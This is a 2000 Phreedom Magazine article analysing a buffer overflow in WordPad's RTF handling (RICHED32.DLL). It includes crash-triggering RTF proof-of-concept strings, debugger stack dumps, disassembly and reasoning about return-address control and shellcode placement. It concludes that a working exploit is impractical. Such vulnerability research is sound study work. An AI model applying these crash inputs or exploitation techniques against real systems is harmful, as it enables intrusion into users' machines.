asco-o:



I. Introduction

 The first report was from Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>

        Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
        overflow problem with ".rtf"-files.

        Crashme.rtf :
        {\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}

        A malicious document may probably abuse this to execute arbitary
        code. WordPad crashes with EIP=41414141.

 Thomas Dullien <dullien@GMX.DE> did a very good research on this
 buffer overflow. Unfortunately I received his vuln-dev post after I
 was deep into the Wordpad code, so I have already discovered most of the
 details that he posted.

        II. Research

     Ok, let's try to exploit this shit. First, try to crash Wordpad.
 Create the following file:

 {\rtf\AAAAAAAAAA(100 'A's)}

 I am using SoftIce to inspect the situation after the crash.
 First, take a look at the registers and the stack.

 EIP=61616161
 ESP=0012F044
 EBP=61616161
                                  ebp      eip
 0023:0012F024 0012F104 00000102 61616161 61616161   ........aaaaaaaa
 0023:0012F034 0000001B 00000246 0012F044 00000023   ....F...D...#...
 0023:0012F044 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F054 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F064 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F074 61616161 61616161 00000000 00000000   aaaaaaaa........

 We can assume that EBP and EIP were popped from the stack and then RET 10
 was executed, decreasing the stack pointer.

 To check if this is the case, try the following:

 {\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}

 Wordpad crashes again. The regiters and the stack are as follows:

 ESP=0012F054
 EBP=6A6A6A6A 'jjjj'
 EIP=6B6B6B6B 'kkkk'

                                   ebp      eip
 0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b   ........jjjjkkkk
 0023:0012F044 0000001B 00000246 0012F054 00000023   ....F...D...#...
 0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F   llllmmmmnnnnoooo
 0023:0012F064 70707070 71717171 72727272 73737373   ppppqqqqrrrrssss
 0023:0012F074 74747474 75757575 76767676 77777777   ttttuuuuvvvvwwww
 0023:0012F084 78787878 79797979 7A7A7A7A 00000200   xxxxyyyyzzzz....

 Yes, our assumption was correct. EBP gets its value from 0012F03C, and the
 RET 10 instruction gets the EIP from 0012F040.

 The buffer is probably 36 characters big, because 'jjjj' overwrites it.
 By the way, notice that the characters are lowercased. This means that the
 buffer is lowercased before the crash.

 Let's try the following file (36 characters):

 {\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}

 It shouldn't crash, but it does. This is strange. Take a look at the
 registers and the stack: (btw, do a quick check with 35 characters - Wordpad
 will not crash)

 EIP=002E0033
 ESP=0012F108
 EBP=00200067

 0023:0012F0E8 0012F294 6E002F02 00200067 002E0033   ...../.ng. .3...
 0023:0012F0F8 0000001B 00000202 0012F108 00000023   ............#...
 0023:0012F108 0020002E 006C0070 00610065 00650073   .. .p.l.e.a.s.e.
 0023:0012F118 00770020 00690061 00000074 00000000    .w.a.i.t.......
 0023:0012F128 00000000 00000000 0000002E 00000000   ................
 0023:0012F138 0012F194 5F816876 00000014 00000000   ....vh._........
 0023:0012F148 00000000 00000001 029AE0CD 00000064   ............d...
 0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850   ........8...Ph._
 0023:0012F168 00C14812 00000000 0012F2A4 00000168   .H..........h...
 0023:0012F178 0012F292 0012F290 00C15810 0012F1A8   .........X......
 0023:0012F188 00C15B3A 00000007 00000006 0012F1CC   :[..............
 0023:0012F198 6C026878 0012F294 0012F290 00C11DC8   xh.l............
 0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
 0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
 0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290   iii}.....k.l....

 This is even more strange. The EBP and EIP are not overwritten by our
 string, but they are still smashed.

 It's time to try to find where exactly is the code, guilty for this mess.
 Notice that the EIP is overwritten and we don't know what code was executed
 before the crash. Pauli Ojanpera posted that the crash was in riched20.dll.
 Check the loaded DLL-s: there is no riched20.dll, but we see riched32.dll.
 This sounds good! At what address is this DLL loaded?

 :map32 riched32
 Owner       Obj Name  Obj#  Address        Size      Type
 RICHED32   .text      0001  001B:6C001000  00027284  CODE  RO

 The code is loaded at 6C001000. Where is the buffer overflow? It is probably
 located in some function in RICHED32.DLL. This function is probably called
 from some other function, which is also called from somewhere. We should
 be able to see the return addresses for these previous calls on the stack.
 Let's search for something that looks like a return address. At 0012F1D0 we
 see the bytes 6C026B81. This looks like an address in RICHED32.DLL, doesn't
 it? Go diassemble the bastard!

 It is part of a function, starting at 6C026B0B and ending at 6C026B68
 (I have incuded some more code in the middle, more about it later)

 001B:6C026B0B push ebp
 001B:6C026B0C mov ebp, esp
 001B:6C026B0E sub esp, 04
 ...
 001B:6C026B7A mox ecx, esi
 001B:6C026B7C call 6C0267D1             ; this is called for each \ tag
 001B:6C026B81 mov [edi], eax
 ...
 001B:6C026B64 pop edi
 001B:6C026B65 pop esi
 001B:6C026B66 mov esp, ebp
 001B:6C026B68 ret

 Put a breakpoint in the beginning of this function and see what happens.
 The 6C026B0B function is called 2 times and crashes the second time.
 Trace it step by step, stepping over the calls. The function crashes
 after the final RET instruction (located at 6C026B68)

 Just before the crash the stack lools like this:

                  edi      esi  local_var  old_ebp
 0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
 0023:0012F1E4 6C024DE0  <- ret address

 The POP EDI and POP ESI instructions restore these two registers (look at
 the disassembly). Then the function restores the ESP (which is saved in EBP
 in the beginning of the function). By trying this with a normal RTF file
 (not causing a buffer overflow), we see that ESP becomes 0012F1E0. Then EBP
 is popped from the stack (it becomes 0012F40C) and the RET instruction
 returnes the execution flow to 6C024DE0.

 This is not the case with a fucked up RTF file. Everything is ok until we
 hit the MOV ESP, EBP instruction. The value in the EBP register is not
 correct, thus fucking up the ESP and causing a mess.

 Ok, now we need to find where in the 6C026B0B function the EBP is smashed.
 Put a breakpoint in the beginning of the function and trace it (without
 stepping into the calls). The EBP in the beginning of the function is
 0012F1E0. It changes after the CALL 6C0267D1 instrcution.

 Now we have the function that changes the EBP.

 001B:6C0267D1 push ebp
 001B:6C0267D2 mov ebp, esp
 001B:6C0267D4 sub esp, 24
 ...

 The stack of this function looks like this:

 0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
 0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
 0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290   iii}.....k.l....
                          ebp      eip

 At 0012F1D4 we have the return address. The EBP is saved at 0012F1D0 and
 then the stack pointer is decremented by 36, leaving space for 36 bytes of
 local variables. Remember this number? This is our buffer!

 After some more tracing, we see that the saved ebp is changed because of
 001B:6C0268E9 mov byte ptr [ebx], 00
 executed right after the buffer is filled with our characters. This
 is a NULL termination of the string, which changes the saved ebp
 from 0012F1D0 to 0012F100.

 Let's do some more reverse engineering. From 6C0268AE to 6C0268DB we have
 a loop that reads our string and copies it into the buffer.

 001B:6C0268AE mov al, [ecx]             ; get the current char
 001B:6C0268B0 inc ecx                   ; ecx points to the next char
 001B:6C0268B1 mov [ebp-01], al          ; store the current char at 0012F1C8
 001B:6C0268B4 mov [esi+1C], ecx         ; store ecx at 0012F2AC
 001B:6C0268B7 mov eax, 00000001         ; what the fuck?
 001B:6C0268BC test eax, eax
 001B:6C0268BE jc 6C0268E9               ; this is never executed
 001B:6C0268C0 movzx eax, byte ptr [ebp-01]      ; get the current char
 001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01  ; is is 'A'-'Z' or 'a'-'z' ?
 001B:6C0268CB jz 6C0268E9                       ; no -> go there
 001B:6C0268CD mov al, [ebp-01]          ; get the current char
 001B:6C0268D0 or al, 20                 ; make it lowercase
 001B:6C0268D2 mov [ebx], al             ; store it in the buffer
 001B:6C0268D4 inc ebx
 001B:6C0268D5 mov ecx, [esi+1c]         ; restore ecx
 001B:6C0268D8 cmp [esi+18], ecx         ; reached the end of the sting?
 001B:6C0268DB jnz 6C0268AE              ; no -> loop again

 ECX is a pointer to the memory location where the RTF file is loaded. It
 points to the character that we are currently copying. EBX points to the
 buffer. The buffer starts at 0012F1A8.

 By the way, notice that the current charcacter is stored at 0012F1C8 (the
 third line in the disassembly). This means that out buffer is only 32 bytes
 long, and we have another local variable after it. This doesn't really
 matter, because the copying process works even if we overwrite this
 variable (it gets restored). If we put some shellcode there, we need to
 know that this particular byte will be changed to the first character after
 the end of the string. In our case, this is '}'

 Notice the "test byte ptr [eax+6C00C6B8], 01" instruction. At this
 memory location (6C00C6B8) we have an array of bytes, corresponding to each
 ASCII value.

 The array at 6C00C6B8
 +00      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +10      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +20      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +30      06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
 +40      00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
 +50      01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
 +60      00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
 +70      01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
 +80      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +90      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +A0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +B0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +C0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +D0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +E0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +F0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

 The only ASCII characters that will pass the JZ condition after the TEST
 instruction are the letters 'A'-'Z' and 'a'-'z' (ASCII values 41-5A and
 61-7A). If any other character is reached, the copying is ended and the
 buffer is NULL terminated.

 Next we try really taking over the return address.

 {\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAA(more As)}

 'jjjj' overwrites the saved EBP and the return address becomes 'kkkk'. After
 the overwritten return address, we have more As.

 0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
 0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
 0023:0012F1C8 7D696969 70707070 71717171 61616161   iii}jjjjkkkkaaaa
 0023:0012F1D8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F1E8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F1F8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F208 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F218 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F228 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F238 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F248 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F258 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F268 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F278 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F288 61616161 61616161 00000000 00000000   aaaaaaaa........
 0023:0012F298 00000000 00000000 00000000 00000000   ................
 0023:0012F2A8 00000000 000C1814 00000000 00000000   ................

 At 0012F2AC we have a pointer to the current character in the file buffer.
 ECX is saved to this location (referenced as esi+1C) before the copying, and
 restored afterwards. This value is updated after every copied byte. If we
 overwrite it, it will start pointing to a new memory location. The copy loop
 will try to read the bytes to copy from there and probably crash. Even if we
 somehow manage to overwrite this with a valid memory pointer, this will be
 the last byte copied from our string.

 This limits us to 216 'A's after the 'jjjjkkkk'.


        III. Is an exploit possible ?

 Exploiting this buffer overflow will be hard. May be not impossible, but
 very hard. We have only 216 bytes to squeese our shell code in, and we can
 use 26 characters - the letters from 'a' to 'z'.

 Writing a shell code with no nulls is hard, writing one only with letters is
 almost impossible.

 First, we need some way of pointing the return address to something usefull.
 We cannot point it to the stack, because the stack address contains
 'prohibited' characters. After the RET instruction the ESP points to the
 second part of our string (the one after 'jjjjkkkk'). We need a JMP ESP or
 CALL ESP instruction. The usual approach is to look at the loaded DLL-s at
 the time of the crash and to find one of these instructions at some memory
 location. Then we can point the return address to this memory location and
 have it jump back to our shell code. The problem is that we need the address
 of this memory location to consist only of lowercase letters.

 c:\>listdlls.exe wordpad

 ListDLLs V2.1
 Copyright (C) 1997-1999 Mark Russinovich
 http://www.sysinternals.com

 ------------------------------------------------------------------------------
 WORDPAD.EXE pid: 275
   Base        Size      Version         Path
   0x029a0000  0x34000   4.00.1381.0096  C:\Program Files\Windows NT\Accessories\wordpad.exe
   0x77f60000  0x5e000   4.00.1381.0174  C:\WINNT\System32\ntdll.dll
   0x5f800000  0xee000   4.21.0000.7160  C:\WINNT\System32\MFC42u.DLL
   0x78000000  0x40000   6.00.8397.0000  C:\WINNT\system32\MSVCRT.dll
   0x77f00000  0x5e000   4.00.1381.0178  C:\WINNT\system32\KERNEL32.dll
   0x77ed0000  0x2c000   4.00.1381.0115  C:\WINNT\system32\GDI32.dll
   0x77e70000  0x54000   4.00.1381.0133  C:\WINNT\system32\USER32.dll
   0x77dc0000  0x3f000   4.00.1381.0203  C:\WINNT\system32\ADVAPI32.dll
   0x77e10000  0x57000   4.00.1381.0193  C:\WINNT\system32\RPCRT4.dll
   0x77d80000  0x32000   4.00.1381.0133  C:\WINNT\system32\comdlg32.dll
   0x70970000  0x1a8000  4.72.3110.0006  C:\WINNT\system32\SHELL32.dll
   0x70bd0000  0x44000   5.00.2314.1000  C:\WINNT\system32\SHLWAPI.dll
   0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll
   0x77b20000  0xb6000   4.00.1381.0190  C:\WINNT\system32\ole32.dll
   0x76aa0000  0x6000    4.00.1371.0001  C:\WINNT\System32\INDICDLL.dll
   0x77c00000  0x18000   4.00.1381.0027  C:\WINNT\System32\WINSPOOL.DRV
   0x775a0000  0x14000   0.02.0000.0000  C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
   0x6c000000  0x2e000   4.00.0993.0004  C:\WINNT\System32\RICHED32.dll
   0x70400000  0x77000   5.00.2314.1000  C:\WINNT\System32\mlang.dll

 These are the loaded DLLs that we can use. The perfect DLL would be the same
 on Windows 95, 98, SE, NT 4 with all service packs and on Win2K.
 Unfortunately such DLL is just a dream. Our choices are really limited.
 Looking at the base addresses, we can eliminate most of the DLLs, because
 they don's have letter addresses. This leaves us only with one DLL that we
 can use:

  0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll

 We can only use the code in the range from from 71616161 to 7161707A.
 After disassembling the DLL and looking at the code, we clearly see that
 there is no JMP ESP or CALL ESP instruction.

 There is no way to execute the shellcode.

 Even if we could do it, making the shellcode do something usefull would be
 pain in the ass. The restrictions are too harsh.

 After the RET instruction, at ESP-50 we have a pointer to the beginning of
 the buffer, where the raw file is loaded. This buffer holds the raw file
 contents, so we can use NULLs and non-letter characters. Unfortunately, this
 buffer is in the heap and we can not execute any code from there. We need to
 copy the code to the stack first.

 The whole situation sucks. At least the Micro$oft users are saved once
 again! But not for long :-)
 
                                                                Solar Eclipse
                                                   (C) 2000 Phreedom Magazine
                                       www.phreedom.org | phreedom.orbitel.bg
                                    staff@phreedom.org :: mboard.phreedom.org